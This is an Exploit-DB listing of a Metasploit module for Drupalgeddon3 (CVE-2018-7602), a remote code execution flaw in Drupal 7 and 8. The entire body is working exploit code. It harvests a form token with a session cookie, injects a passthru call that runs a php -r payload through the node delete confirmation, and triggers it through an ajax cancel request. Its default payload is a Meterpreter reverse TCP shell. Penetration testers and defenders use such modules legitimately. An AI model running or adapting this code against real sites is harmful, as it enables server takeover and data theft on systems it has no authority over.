EDB-ID: 44557 | Author: SixP4ck3r | Published: 2018-04-30 | CVE: CVE-2018-7602 | Type: Remote | Platform: PHP | Aliases: Drupalgeddon3 | Advisory/Source: N/A | Tags: Metasploit Framework (MSF) | Vulnerable App:  | # This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => 'Drupalgeddon3',
'Description' => %q{
CVE-2018-7602 / SA-CORE-2018-004
A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x.
This potentially allows attackers to exploit multiple attack vectors on a Drupal site
Which could result in the site being compromised.
This vulnerability is related to Drupal core - Highly critical - Remote Code Execution
The module can load msf PHP arch payloads, using the php/base64 encoder.
The resulting RCE on Drupal looks like this: php -r 'eval(base64_decode(#{PAYLOAD}));'
},
'License' => MSF_LICENSE,
'Author' =>
[
'SixP4ck3r', # Research and port to MSF
'Blaklis' # Initial PoC
],
'References' =>
[
['SA-CORE', '2018-004'],
['CVE', '2018-7602'],
],
'DefaultOptions' =>
{
'encoder' => 'php/base64',
'payload' => 'php/meterpreter/reverse_tcp',
},
'Privileged' => false,
'Platform' => ['php'],
'Arch' => [ARCH_PHP],
'Targets' =>
[
['User register form with exec', {}],
],
'DisclosureDate' => 'Apr 29 2018',
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [ true, "The target URI of the Drupal installation", '/']),
OptString.new('DRUPAL_NODE', [ true, "Exist Node Number (Page, Article, Forum topic, or a Post)", '1']),
OptString.new('DRUPAL_SESSION', [ true, "Authenticated Cookie Session", '']),
])
register_advanced_options(
[
])
end
def uri_path
normalize_uri(target_uri.path)
end
def start_exploit
drupal_node = datastore['DRUPAL_NODE']
res = send_request_cgi({
'cookie' => datastore['DRUPAL_SESSION'],
'method' => 'GET',
'uri' => "#{uri_path}/node/#{drupal_node}/delete"
})
form_token = res.body.scan( /form_token" value="([^>]*)" \/>/).last.first
print "[*] Token Form -> #{form_token}\n"
r2 = send_request_cgi({
'method' => 'POST',
'cookie' => datastore['DRUPAL_SESSION'],
'uri' => "#{uri_path}/?q=node/#{drupal_node}/delete&destination=node?q[%2523post_render][]=passthru%26q[%2523type]=markup%26q[%2523markup]=php%20-r%20'#{payload.encoded}'",
'vars_post' => {
'form_id' => 'node_delete_confirm',
'_triggering_element_name' => 'form_id',
'form_token'=> "#{form_token}"
}
})
form_build_id = r2.body.scan( /form_build_id" value="([^>]*)" \/>/).last.first
print "[*] Token Form_build_id -> #{form_build_id}\n"
r3 = send_request_cgi({
'method' => 'POST',
'cookie' => datastore['DRUPAL_SESSION'],
'uri' => "#{uri_path}/?q=file/ajax/actions/cancel/%23options/path/#{form_build_id}",
'vars_post' => {
'form_build_id' => "#{form_build_id}"
}
})
end
def exploit
case datastore['TARGET']
when 0
start_exploit
else
fail_with(Failure::BadConfig, "Your target is invalid.")
end
end
end
